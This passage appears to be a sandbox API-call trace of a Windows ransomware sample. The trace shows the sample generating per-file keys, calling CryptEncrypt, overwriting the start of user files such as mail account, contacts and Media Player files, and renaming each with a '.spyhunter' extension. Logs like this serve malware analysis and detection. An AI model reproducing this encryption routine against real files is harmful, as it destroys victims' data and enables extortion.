dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.524] WriteFile (in: hFile=0x16c, lpBuffer=0x270efbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ef7c, lpOverlapped=0x0 | out: lpBuffer=0x270efbc*, lpNumberOfBytesWritten=0x270ef7c*=0x4, lpOverlapped=0x0) returned 1 [0141.526] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ef7c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270ef7c*=0x30, lpOverlapped=0x0) returned 1 [0141.526] CloseHandle (hObject=0x16c) returned 1 [0141.526] GetProcessHeap () returned 0x2c0000 [0141.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0141.526] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb.spyhunter") returned 92 [0141.526] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\CurrentDatabase_372.wmdb.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\currentdatabase_372.wmdb.spyhunter")) returned 1 [0141.527] GetProcessHeap () returned 0x2c0000 [0141.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0141.527] GetProcessHeap () returned 0x2c0000 [0141.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0141.527] GetProcessHeap () returned 0x2c0000 [0141.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f65898 | out: hHeap=0x2c0000) returned 1 [0141.528] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270efb8 | out: pbBuffer=0x270efb8) returned 1 [0141.528] GetProcessHeap () returned 0x2c0000 [0141.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0141.528] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270efb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270efb0*=0x30) returned 1 [0141.528] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\.." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0141.537] GetProcessHeap () returned 0x2c0000 [0141.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0141.537] GetProcessHeap () returned 0x2c0000 [0141.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fef5b0 | out: hHeap=0x2c0000) returned 1 [0141.537] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270efb8 | out: pbBuffer=0x270efb8) returned 1 [0141.537] GetProcessHeap () returned 0x2c0000 [0141.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0141.537] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270efb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270efb0*=0x30) returned 1 [0141.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0141.539] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount") returned 113 [0141.539] StrStrW (lpFirst="account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount", lpSrch=".txt") returned 0x0 [0141.539] GetProcessHeap () returned 0x2c0000 [0141.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0141.539] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ef74, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270ef74*=0x2a0, lpOverlapped=0x0) returned 1 [0141.559] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffd60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.559] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x270ef74, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270ef74*=0x2a0, lpOverlapped=0x0) returned 1 [0141.560] GetProcessHeap () returned 0x2c0000 [0141.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0141.560] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.560] WriteFile (in: hFile=0x158, lpBuffer=0x270efb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ef74, lpOverlapped=0x0 | out: lpBuffer=0x270efb4*, lpNumberOfBytesWritten=0x270ef74*=0x4, lpOverlapped=0x0) returned 1 [0141.560] WriteFile (in: hFile=0x158, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ef74, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270ef74*=0x30, lpOverlapped=0x0) returned 1 [0141.560] CloseHandle (hObject=0x158) returned 1 [0141.561] GetProcessHeap () returned 0x2c0000 [0141.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f82de8 [0141.561] wnsprintfW (in: pszDest=0x2f82de8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount.spyhunter") returned 123 [0141.561] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount.spyhunter")) returned 1 [0141.562] GetProcessHeap () returned 0x2c0000 [0141.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f82de8 | out: hHeap=0x2c0000) returned 1 [0141.562] GetProcessHeap () returned 0x2c0000 [0141.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0141.562] GetProcessHeap () returned 0x2c0000 [0141.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3003a68 | out: hHeap=0x2c0000) returned 1 [0141.562] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270efb0 | out: pbBuffer=0x270efb0) returned 1 [0141.562] GetProcessHeap () returned 0x2c0000 [0141.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0141.562] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270efa8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270efa8*=0x30) returned 1 [0141.562] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\.." (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0141.934] GetProcessHeap () returned 0x2c0000 [0141.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0141.934] GetProcessHeap () returned 0x2c0000 [0141.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fef400 | out: hHeap=0x2c0000) returned 1 [0141.936] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270efa8 | out: pbBuffer=0x270efa8) returned 1 [0141.936] GetProcessHeap () returned 0x2c0000 [0141.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0141.936] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270efa0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270efa0*=0x30) returned 1 [0141.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0141.937] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML") returned 75 [0141.937] StrStrW (lpFirst="WMSDKNS.XML", lpSrch=".txt") returned 0x0 [0141.937] GetProcessHeap () returned 0x2c0000 [0141.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.937] ReadFile (in: hFile=0x184, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ef64, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ef64*=0x27cf, lpOverlapped=0x0) returned 1 [0141.946] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffd831, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.946] WriteFile (in: hFile=0x184, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x27cf, lpNumberOfBytesWritten=0x270ef64, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ef64*=0x27cf, lpOverlapped=0x0) returned 1 [0141.946] GetProcessHeap () returned 0x2c0000 [0141.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.946] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.946] WriteFile (in: hFile=0x184, lpBuffer=0x270efa4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ef64, lpOverlapped=0x0 | out: lpBuffer=0x270efa4*, lpNumberOfBytesWritten=0x270ef64*=0x4, lpOverlapped=0x0) returned 1 [0141.947] WriteFile (in: hFile=0x184, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ef64, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270ef64*=0x30, lpOverlapped=0x0) returned 1 [0141.947] CloseHandle (hObject=0x184) returned 1 [0141.947] GetProcessHeap () returned 0x2c0000 [0141.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0141.948] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.spyhunter") returned 85 [0141.948] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml.spyhunter")) returned 1 [0141.949] GetProcessHeap () returned 0x2c0000 [0141.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0141.949] GetProcessHeap () returned 0x2c0000 [0141.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0141.949] GetProcessHeap () returned 0x2c0000 [0141.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff7ac8 | out: hHeap=0x2c0000) returned 1 [0141.952] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef98 | out: pbBuffer=0x270ef98) returned 1 [0141.953] GetProcessHeap () returned 0x2c0000 [0141.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0141.953] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270ef90*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270ef90*=0x30) returned 1 [0141.953] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt" (normalized: "c:\\users\\default\\appdata\\local\\temp\\fxsapidebuglogfile.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0141.953] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt") returned 62 [0141.953] StrStrW (lpFirst="FXSAPIDebugLogFile.txt", lpSrch=".txt") returned=".txt" [0141.953] lstrlenW (lpString=".txt") returned 4 [0141.953] lstrlenW (lpString=".txt") returned 4 [0141.953] GetProcessHeap () returned 0x2c0000 [0141.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.953] ReadFile (in: hFile=0x184, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ef54, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ef54*=0x0, lpOverlapped=0x0) returned 1 [0141.953] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.954] WriteFile (in: hFile=0x184, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x270ef54, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ef54*=0x0, lpOverlapped=0x0) returned 1 [0141.954] GetProcessHeap () returned 0x2c0000 [0141.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.954] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.954] WriteFile (in: hFile=0x184, lpBuffer=0x270ef94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ef54, lpOverlapped=0x0 | out: lpBuffer=0x270ef94*, lpNumberOfBytesWritten=0x270ef54*=0x4, lpOverlapped=0x0) returned 1 [0141.954] WriteFile (in: hFile=0x184, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ef54, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270ef54*=0x30, lpOverlapped=0x0) returned 1 [0141.955] CloseHandle (hObject=0x184) returned 1 [0141.955] GetProcessHeap () returned 0x2c0000 [0141.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0141.955] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt.spyhunter") returned 72 [0141.955] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt" (normalized: "c:\\users\\default\\appdata\\local\\temp\\fxsapidebuglogfile.txt"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\temp\\fxsapidebuglogfile.txt.spyhunter")) returned 1 [0141.956] GetProcessHeap () returned 0x2c0000 [0141.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0141.956] GetProcessHeap () returned 0x2c0000 [0141.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0141.956] GetProcessHeap () returned 0x2c0000 [0141.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3030c40 | out: hHeap=0x2c0000) returned 1 [0141.956] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef98 | out: pbBuffer=0x270ef98) returned 1 [0141.956] GetProcessHeap () returned 0x2c0000 [0141.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0141.956] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270ef90*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270ef90*=0x30) returned 1 [0141.956] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0141.956] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD") returned 75 [0141.956] StrStrW (lpFirst="WMSDKNS.DTD", lpSrch=".txt") returned 0x0 [0141.956] GetProcessHeap () returned 0x2c0000 [0141.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.956] ReadFile (in: hFile=0x184, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ef54, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ef54*=0x1f2, lpOverlapped=0x0) returned 1 [0141.957] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffffe0e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.957] WriteFile (in: hFile=0x184, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1f2, lpNumberOfBytesWritten=0x270ef54, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ef54*=0x1f2, lpOverlapped=0x0) returned 1 [0141.957] GetProcessHeap () returned 0x2c0000 [0141.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.957] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.958] WriteFile (in: hFile=0x184, lpBuffer=0x270ef94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ef54, lpOverlapped=0x0 | out: lpBuffer=0x270ef94*, lpNumberOfBytesWritten=0x270ef54*=0x4, lpOverlapped=0x0) returned 1 [0141.958] WriteFile (in: hFile=0x184, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ef54, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270ef54*=0x30, lpOverlapped=0x0) returned 1 [0141.958] CloseHandle (hObject=0x184) returned 1 [0141.958] GetProcessHeap () returned 0x2c0000 [0141.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0141.958] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.spyhunter") returned 85 [0141.958] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd.spyhunter")) returned 1 [0142.058] GetProcessHeap () returned 0x2c0000 [0142.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.058] GetProcessHeap () returned 0x2c0000 [0142.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0142.058] GetProcessHeap () returned 0x2c0000 [0142.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff79e8 | out: hHeap=0x2c0000) returned 1 [0142.058] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef90 | out: pbBuffer=0x270ef90) returned 1 [0142.058] GetProcessHeap () returned 0x2c0000 [0142.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0142.058] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270ef88*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270ef88*=0x30) returned 1 [0142.058] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0142.183] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact") returned 51 [0142.183] StrStrW (lpFirst="Administrator.contact", lpSrch=".txt") returned 0x0 [0142.183] GetProcessHeap () returned 0x2c0000 [0142.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0142.183] ReadFile (in: hFile=0x120, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ef4c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ef4c*=0x2800, lpOverlapped=0x0) returned 1 [0142.223] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.223] WriteFile (in: hFile=0x120, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ef4c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ef4c*=0x2800, lpOverlapped=0x0) returned 1 [0142.223] GetProcessHeap () returned 0x2c0000 [0142.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0142.223] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.223] WriteFile (in: hFile=0x120, lpBuffer=0x270ef8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ef4c, lpOverlapped=0x0 | out: lpBuffer=0x270ef8c*, lpNumberOfBytesWritten=0x270ef4c*=0x4, lpOverlapped=0x0) returned 1 [0142.322] WriteFile (in: hFile=0x120, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ef4c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270ef4c*=0x30, lpOverlapped=0x0) returned 1 [0142.322] CloseHandle (hObject=0x120) returned 1 [0142.322] GetProcessHeap () returned 0x2c0000 [0142.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.322] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.spyhunter") returned 61 [0142.322] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.spyhunter" (normalized: "c:\\users\\default\\contacts\\administrator.contact.spyhunter")) returned 1 [0142.323] GetProcessHeap () returned 0x2c0000 [0142.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.323] GetProcessHeap () returned 0x2c0000 [0142.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0142.323] GetProcessHeap () returned 0x2c0000 [0142.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0400 | out: hHeap=0x2c0000) returned 1 [0142.323] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef90 | out: pbBuffer=0x270ef90) returned 1 [0142.323] GetProcessHeap () returned 0x2c0000 [0142.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0142.324] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270ef88*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270ef88*=0x30) returned 1 [0142.324] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\.." (normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.325] GetProcessHeap () returned 0x2c0000 [0142.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0142.326] GetProcessHeap () returned 0x2c0000 [0142.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30ebf8 | out: hHeap=0x2c0000) returned 1 